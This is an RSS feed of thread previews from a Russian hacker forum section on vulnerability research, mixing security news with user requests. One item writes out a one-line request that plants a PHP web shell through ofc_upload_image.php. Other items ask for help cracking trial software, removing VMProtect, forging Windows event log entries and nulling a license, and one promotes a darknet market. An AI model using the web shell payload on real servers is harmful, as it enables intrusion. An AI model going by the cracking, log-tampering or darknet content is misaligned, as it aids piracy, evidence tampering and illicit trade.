<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
  <channel>
    <title>Поиск и эксплуатация уязвимостей</title>
    <description>Исследование программного обеспечения, с целью выявления слабых мест в защите программы. Возможности эксплуатации найденных уязвимостей.</description>
    <pubDate>Sun, 27 Sep 2026 06:03:25 +0000</pubDate>
    <lastBuildDate>Sun, 27 Sep 2026 06:03:25 +0000</lastBuildDate>
    <generator>Хакерский форум: свобода информации, безопасность</generator>
    <link>https://xaker.name/forum/poisk-uyazvimostey/</link>
    <atom:link rel="self" type="application/rss+xml" href="https://xaker.name/forum/poisk-uyazvimostey/index.rss"/>
    <item>
      <title>Создание бота для покупок в интернет магазинах</title>
      <pubDate>Wed, 24 Mar 2021 16:11:05 +0000</pubDate>
      <link>https://xaker.name/threads/33123/</link>
      <guid>https://xaker.name/threads/33123/</guid>
      <author>invalid@example.com (Julik11)</author>
      <dc:creator>Julik11</dc:creator>
      <content:encoded><![CDATA[Добрый день, дамы и господа! Нужен специалист, который сможет написать бота для покупок в крупных интернет магазинах. Надоело пытаться отследить вручную, а когда позвонил вроде сразу или оформил заказ сказали, что уже закончился товар. <br />
Можем работать в белую, могу оплатить криптой, без разницы, лишь бы человек был нормальный.]]></content:encoded>
    </item>
    <item>
      <title>How to spent your Monero in a great way?</title>
      <pubDate>Tue, 07 Jan 2020 15:49:11 +0000</pubDate>
      <link>https://xaker.name/threads/32229/</link>
      <guid>https://xaker.name/threads/32229/</guid>
      <author>invalid@example.com (Uzyaakodak)</author>
      <dc:creator>Uzyaakodak</dc:creator>
      <content:encoded><![CDATA[Empire Market is big and most notorious Onion Net Marketplace right now. Being this great has it&#039;s consequences continuous Ddos attacks witch leads main Empire Market link to be down, and alternative links too. That means to empire market need to design more and more URLs and tor mirror and links. And the problem is that there is not to many ways users can find a legit Empire Marketplace link.<br />
That&#039;s why Empire Market decided to create an original website where their users can at any time...<br />
<br />
<a href="https://xaker.name/threads/32229/" class="internalLink">How to spent your Monero in a great way?</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Снятие vmprota</title>
      <pubDate>Sat, 04 Jan 2020 15:29:45 +0000</pubDate>
      <link>https://xaker.name/threads/26454/</link>
      <guid>https://xaker.name/threads/26454/</guid>
      <author>invalid@example.com (websters)</author>
      <dc:creator>websters</dc:creator>
      <content:encoded><![CDATA[Всем привет, трабла со снятием vmprotect&#039;a 1.63 версии ( по данным RDG Packer&#039;a ). Никак не могу найти подходящий софт, мало того что версия старая (!!!), а распаковщиков нет. Тем более прога блокирует дебугеры. Софт который находится под ней тоже важный, но в основном интересует сам процесс распаковки. Кто может помочь, буду благодарен. <br />
Сама программа:<br />
<a href="http://rghost.ru/38905684" target="_blank" class="externalLink" rel="nofollow">http://rghost.ru/38905684</a><br />
<br />
P.S. Na tuts4you.com был, не нашел.<br />
P.S.P.S. Пытался использовать скрипты, но они явно не...<br />
<br />
<a href="https://xaker.name/threads/26454/" class="internalLink">Снятие vmprota</a>]]></content:encoded>
      <slash:comments>6</slash:comments>
    </item>
    <item>
      <title>Взлом триала, нашел выход, но не доработан). прошу вашей помощи</title>
      <pubDate>Fri, 03 Jan 2020 19:29:29 +0000</pubDate>
      <link>https://xaker.name/threads/30699/</link>
      <guid>https://xaker.name/threads/30699/</guid>
      <author>invalid@example.com (simasit)</author>
      <dc:creator>simasit</dc:creator>
      <content:encoded><![CDATA[Добрый день!<br />
Уже битый месяц не могу ломануть триал версию программки. Она даёт 14 дней полного пользования, а затем плати деньгу(<br />
Пробовал всякие Trial Reset, Run As Date и т.п., удалял с реестра всё что связано с этой прогой. Ничего не помогает решить проблему.<br />
Но! Я ради этой проги <b>поменял винду (стоит XP),  установил назад эту программку, и она выдала мне ещё 14 дней пользования</b>. Я был очень рад, что она не связана с MAC-адресом)<br />
Работал через неё, перезагружая\выключая комп,...<br />
<br />
<a href="https://xaker.name/threads/30699/" class="internalLink">Взлом триала, нашел выход, но не доработан). прошу вашей помощи</a>]]></content:encoded>
      <slash:comments>7</slash:comments>
    </item>
    <item>
      <title>[Помощь] чутка модифицировать исполняемый MMORPG</title>
      <pubDate>Thu, 02 Jan 2020 17:57:41 +0000</pubDate>
      <link>https://xaker.name/threads/30379/</link>
      <guid>https://xaker.name/threads/30379/</guid>
      <author>invalid@example.com (valkiriy)</author>
      <dc:creator>valkiriy</dc:creator>
      <content:encoded><![CDATA[Есть MMORPG, пытался отключить защиту на извлечение ресурсов, но в исполняемом стоит защита на отладку, а вот как ее обойти - я ноль...<br />
<br />
ссылка на клиент metin2 mmorpg:<br />
<a href="http://dlcl.gfsrv.net/gfl/Metin2_GameforgeLiveSetup.exe" target="_blank" class="externalLink" rel="nofollow">http://dlcl.gfsrv.net/gfl/Metin2_GameforgeLiveSetup.exe</a><br />
<br />
Вот так выглядит отрывок допотопного исполняемого блокирующий извлечение ресурсов в HEX-редакторе<br />
<a href="http://www.floomby.ru/s2/gUUkmx" target="_blank" class="externalLink" rel="nofollow">http://www.floomby.ru/s2/gUUkmx</a><br />
<br />
ссылка на source допотопнго исполняемого...<br />
<br />
<a href="https://xaker.name/threads/30379/" class="internalLink">[Помощь] чутка модифицировать исполняемый MMORPG</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Опасный баг в EXIM позволяет выполнять на сервере команды от root</title>
      <pubDate>Sat, 07 Dec 2019 14:10:21 +0000</pubDate>
      <link>https://xaker.name/threads/31849/</link>
      <guid>https://xaker.name/threads/31849/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[Исследователи из Qualys обнаружили в почтовом агенте Exim легко эксплуатируемую уязвимость, позволяющую выполнить в системе любую команду с правами суперпользователя. По данным канадских аналитиков, в настоящее время Exim используют больше половины почтовых серверов в Интернете, или полмиллиона в числовом выражении. Репортеру ZDNet также стало известно, что результат поиска через Shodan оказался на порядок больше — 5,4 млн.<br />
<br />
Опасная уязвимость, получившая идентификатор...<br />
<br />
<a href="https://xaker.name/threads/31849/" class="internalLink">Опасный баг в EXIM позволяет выполнять на сервере команды от root</a>]]></content:encoded>
      <slash:comments>2</slash:comments>
    </item>
    <item>
      <title>Любой iPhone можно взломать через «дыру» в JavaScript</title>
      <pubDate>Mon, 18 Nov 2019 16:22:42 +0000</pubDate>
      <link>https://xaker.name/threads/31504/</link>
      <guid>https://xaker.name/threads/31504/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[Исследователи вопросов безопасности из университета Ньюкасла в Великобритании опубликовали работу в издании Journal of Infermation Security, в которой описали возможность отслеживать пользовательские жесты на смартфонах. Для этого потребуется лишь небольшое приложение на JavaScript, которое эксплуатирует программные интерфейсы (API) сенсоров движения устройства.<br />
<br />
По утверждению авторов исследования, это приложение может собрать достаточно информации с сенсоров, чтобы в 70% случаев выяснить...<br />
<br />
<a href="https://xaker.name/threads/31504/" class="internalLink">Любой iPhone можно взломать через «дыру» в JavaScript</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Проверить программу на наличие перехватчиков паролей</title>
      <pubDate>Thu, 25 Apr 2019 17:48:50 +0000</pubDate>
      <link>https://xaker.name/threads/30592/</link>
      <guid>https://xaker.name/threads/30592/</guid>
      <author>invalid@example.com (Grin4)</author>
      <dc:creator>Grin4</dc:creator>
      <content:encoded><![CDATA[Просьба проверить программу на наличие вредоносного ПО и приложить отчет о проделанной работе.<br />
Нужны гуру.<br />
<a href="http://rghost.ru/72yWVCbmJ" target="_blank" class="externalLink" rel="nofollow">Скачать</a>]]></content:encoded>
      <slash:comments>3</slash:comments>
    </item>
    <item>
      <title>Нуленный ISPmanager</title>
      <pubDate>Mon, 09 Apr 2018 11:16:07 +0000</pubDate>
      <link>https://xaker.name/threads/31537/</link>
      <guid>https://xaker.name/threads/31537/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[<a href="http://www.anchous.info/nulennyiy-vechnyiy-isp-svoimi-rukami" target="_blank" class="externalLink" rel="nofollow">http://www.anchous.info/nulennyiy-vechnyiy-isp-svoimi-rukami</a><br />
Писал изначально статью для своего айтишного блога, но потом подумал и решил, что раз он у меня хостится в рашке, то мне могут создать к нему проблем беспричинными абузами, так что решил перенести на эту площадку.<br />
<br />
Ковырялся тут пару дней с ISP манагером и в голову пришла шальная мысля проверить один способ, древний как дерьмо мамонта, по пролонгации лицензии, генерящихся на определенный IP.<br />
<br />
Надо заметить, что способ...<br />
<br />
<a href="https://xaker.name/threads/31537/" class="internalLink">Нуленный ISPmanager</a>]]></content:encoded>
    </item>
    <item>
      <title>Перехват SMS через уязвимости в сигнальном протоколе SS7</title>
      <pubDate>Sun, 07 May 2017 21:13:26 +0000</pubDate>
      <link>https://xaker.name/threads/31510/</link>
      <guid>https://xaker.name/threads/31510/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
    </item>
    <item>
      <title>Испанские киберэксперты выявили недостатки анонимной сети Tor</title>
      <pubDate>Sat, 15 Apr 2017 15:34:36 +0000</pubDate>
      <link>https://xaker.name/threads/31503/</link>
      <guid>https://xaker.name/threads/31503/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[<a href="https://xaker.name/attachments/1452/" target="_blank">Посмотреть вложение 1452</a>
	
<br />
Эксперты в области кибербезопасности из расположенного в Испании университета «Деусто» указали на слабые стороны <strong>уязвимости анонимной сети Tor</strong>. По их мнению, установить реальный IP-адрес пользователей в ней не так сложно, если они используют только один уровень защиты. Виной тому – наличие связи между общедоступными сегментами Интернета и <a href="http://roscenzura.com/threads/739/" target="_blank" class="externalLink" rel="nofollow">Даркнетом</a>.<br />
<br />
Возглавляемая Искандером Санчес-Ролой группа в ходе...<br />
<br />
<a href="https://xaker.name/threads/31503/" class="internalLink">Испанские киберэксперты выявили недостатки анонимной сети Tor</a>]]></content:encoded>
    </item>
    <item>
      <title>Как угнать автомобиль Tesla?</title>
      <pubDate>Tue, 20 Dec 2016 07:26:22 +0000</pubDate>
      <link>https://xaker.name/threads/31478/</link>
      <guid>https://xaker.name/threads/31478/</guid>
      <author>invalid@example.com (Сашка Суралмашка)</author>
      <dc:creator>Сашка Суралмашка</dc:creator>
      <content:encoded><![CDATA[Вы наверняка, слышали об огромном количестве устройств в сетях бот-нетов, но специалисты норвежской компании Promon пошли значительно дальше в своих экспериментах. Ранее исследователи компании Tencent Keen Security Lab показали как можно взломать автомобиль Tesla Model S P85 и Model 75D, для реализации подобной атаки было скомпрометировано бортовое ПО самого автомобиля, но парни из Норвегии пошли совсем другим путём, они решили...<br />
<br />
<a href="https://xaker.name/threads/31478/" class="internalLink">Как угнать автомобиль Tesla?</a>]]></content:encoded>
    </item>
    <item>
      <title>Опасность — Documents Microsoft Word</title>
      <pubDate>Sat, 17 Dec 2016 23:05:05 +0000</pubDate>
      <link>https://xaker.name/threads/31476/</link>
      <guid>https://xaker.name/threads/31476/</guid>
      <author>invalid@example.com (Сашка Суралмашка)</author>
      <dc:creator>Сашка Суралмашка</dc:creator>
      <content:encoded><![CDATA[В офисных документах Microsoft Word есть такая вещь как «макрос», который реализуется в Visual Basic для приложений, сокращёно VBA это язык программирования. VBA — это почти такой же основной визуальыйн язык, отличие только в том, что VB компилируется в исполняемый файл, а VBA нужен документ как носитель.<br />
В моей предыдущей статье, я проанализировал .SVG изображения, котоыре используются в распространённых вредоносных программах. Изображения .SVG используют встроенный JavaScript, который...<br />
<br />
<a href="https://xaker.name/threads/31476/" class="internalLink">Опасность — Documents Microsoft Word</a>]]></content:encoded>
    </item>
    <item>
      <title>Уязвимость в Android шифровании</title>
      <pubDate>Sun, 03 Jul 2016 11:10:47 +0000</pubDate>
      <link>https://xaker.name/threads/31420/</link>
      <guid>https://xaker.name/threads/31420/</guid>
      <author>invalid@example.com (Vialaia)</author>
      <dc:creator>Vialaia</dc:creator>
      <content:encoded><![CDATA[Обнаружена новая уязвимость в Android шифровании, работающих на базе процессоров Qualcomm Snapdragon. Для ее взлома понадобится брутфорс и немножечко терпения.<br />
<br />
Шаги взлома <a href="http://bits-please.blogspot.ru/2016/06/extracting-qualcomms-keymaster-keys.html" target="_blank" class="externalLink" rel="nofollow">опубликовал</a> в личном блоге некий Беньямини, которым и была найдена данная угроза.<br />
<br />
Android проводит шифрование с помощью рендомного 128-битного ключа Device Encryption Key. Сам ключ также шифруется в связи с чем его хранение на...<br />
<br />
<a href="https://xaker.name/threads/31420/" class="internalLink">Уязвимость в Android шифровании</a>]]></content:encoded>
    </item>
    <item>
      <title>Веб-клиент Telegram был уязвим перед кликджекингом</title>
      <pubDate>Fri, 29 Apr 2016 09:39:11 +0000</pubDate>
      <link>https://xaker.name/threads/31252/</link>
      <guid>https://xaker.name/threads/31252/</guid>
      <author>invalid@example.com (Vialaia)</author>
      <dc:creator>Vialaia</dc:creator>
      <content:encoded><![CDATA[Не получается атаковать шифрование – ищи проблемы в клиенте. Именно таким принципом руководствовался египетский исследователь Мохамед А. Басет (Mohamed A. Baset), когда искал возможность скомпрометировать Telegram. Данная тактика принесла плоды: Басет обнаружил уязвимость в веб-клиенте популярного мессенджера.<br />
<br />
В блоге исследователь рассказал, что веб-клиент Telegram оказался не защищен от обыкновенных кликджекинг-атак. Вместо заголовка X-Frame-Options веб-версия мессенджера использовала...<br />
<br />
<a href="https://xaker.name/threads/31252/" class="internalLink">Веб-клиент Telegram был уязвим перед кликджекингом</a>]]></content:encoded>
    </item>
    <item>
      <title>Ofc_upload_image.php remote php code execution vulnerability</title>
      <pubDate>Sat, 09 Apr 2016 14:34:30 +0000</pubDate>
      <link>https://xaker.name/threads/31176/</link>
      <guid>https://xaker.name/threads/31176/</guid>
      <author>invalid@example.com (v1nest)</author>
      <dc:creator>v1nest</dc:creator>
      <content:encoded><![CDATA[Эксплуатируя уязвимость в одной из php-библиотек — ofc_upload_image.php злоумышленник может удаленно провести выполнение произвольного php кода на атакуемой системе.<br />
<br />
Уязвимость связана с недостаточной фильтрацией входящих данных. С помощью специализированного запроса URI атакующий может сформировать php-файл c произвольным содержимым:<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>
ofc_upload_image.php?name=shell.php&amp;HTTP_RAW_POST_DATA=&lt;?system($_GET['cmd']);?&gt;
</pre>
</div>Хотя уязвимости уже более 3 лет, тем не менее злоумышленники...<br />
<br />
<a href="https://xaker.name/threads/31176/" class="internalLink">Ofc_upload_image.php remote php code execution vulnerability</a>]]></content:encoded>
    </item>
    <item>
      <title>Журнал событий Windows *.evtx</title>
      <pubDate>Sun, 31 Jan 2016 08:16:22 +0000</pubDate>
      <link>https://xaker.name/threads/29915/</link>
      <guid>https://xaker.name/threads/29915/</guid>
      <author>invalid@example.com (Василий+1)</author>
      <dc:creator>Василий+1</dc:creator>
      <content:encoded><![CDATA[Здравствуйте.<br />
Подскажите пожалуйста чем можно поправить записи в журнале событий Windows? Файлы с расширением &quot;*.evtx&quot;.<br />
Пытался открыть текстовыми редакторами с разной кодировкой не вышло((<br />
Очень нужно добавить туда записи.]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>В архиваторе winrar обнаружена критическая уязвимость</title>
      <pubDate>Fri, 22 Jan 2016 05:20:55 +0000</pubDate>
      <link>https://xaker.name/threads/30938/</link>
      <guid>https://xaker.name/threads/30938/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[Иранский специалист Мохаммад Реза Эспархам распространил информацию об обнаруженной им уязвимости в популярном архиваторе WinRAR. В качестве доказательства эксперт приводит подробную видеоинструкцию по её использованию, размещенную на видеохостинге Youtube. По словам Эспархама, угроза информационной безопасности актуальна для пользователей, использующих любую из версий приложения.<br />
<br />
Суть уязвимости заключается в возможности встраивать в архив HTML-код и JavaScript для запуска сторонних...<br />
<br />
<a href="https://xaker.name/threads/30938/" class="internalLink">В архиваторе winrar обнаружена критическая уязвимость</a>]]></content:encoded>
      <slash:comments>2</slash:comments>
    </item>
    <item>
      <title>Даунлоадер</title>
      <pubDate>Thu, 12 Mar 2015 16:31:24 +0000</pubDate>
      <link>https://xaker.name/threads/30163/</link>
      <guid>https://xaker.name/threads/30163/</guid>
      <author>invalid@example.com (andersen62)</author>
      <dc:creator>andersen62</dc:creator>
      <content:encoded><![CDATA[Ребята помогите с даунлоадером. Клиент открыл файл и ушли в ж...опу файлы doc xls jpg<br />
<br />
ссылка на лоадер <a href="http://rghost.net/6nTN64DHV" target="_blank" class="externalLink" rel="nofollow">http://rghost.net/6nTN64DHV</a><br />
ссылка на криптованные jpg <a href="http://rghost.net/84pcZM44y" target="_blank" class="externalLink" rel="nofollow">http://rghost.net/84pcZM44y</a><br />
ссылка на криптованный word <a href="http://rghost.net/8BZ58X244" target="_blank" class="externalLink" rel="nofollow">http://rghost.net/8BZ58X244</a><br />
<br />
Заранее благодарен]]></content:encoded>
      <slash:comments>6</slash:comments>
    </item>
    <item>
      <title>[Помощь] Проверить программу</title>
      <pubDate>Mon, 29 Dec 2014 11:26:08 +0000</pubDate>
      <link>https://xaker.name/threads/30094/</link>
      <guid>https://xaker.name/threads/30094/</guid>
      <author>invalid@example.com (N3m0s)</author>
      <dc:creator>N3m0s</dc:creator>
      <content:encoded><![CDATA[Здравствуйте, помогите проверить программу на вредоносные ссылки, js. Есть подозрение что программа распространяет вредоносные ссылки и js.<br />
<a href="http://zona.ru/" target="_blank" class="externalLink" rel="nofollow">Программа </a>, если можно полный отчет. Хулиган помоги <img src="styles/default/xenforo/clear.png" class="mceSmilieSprite mceSmilie1" alt=":)" title="Smile    :)" />:thx:]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
  </channel>
</rss>
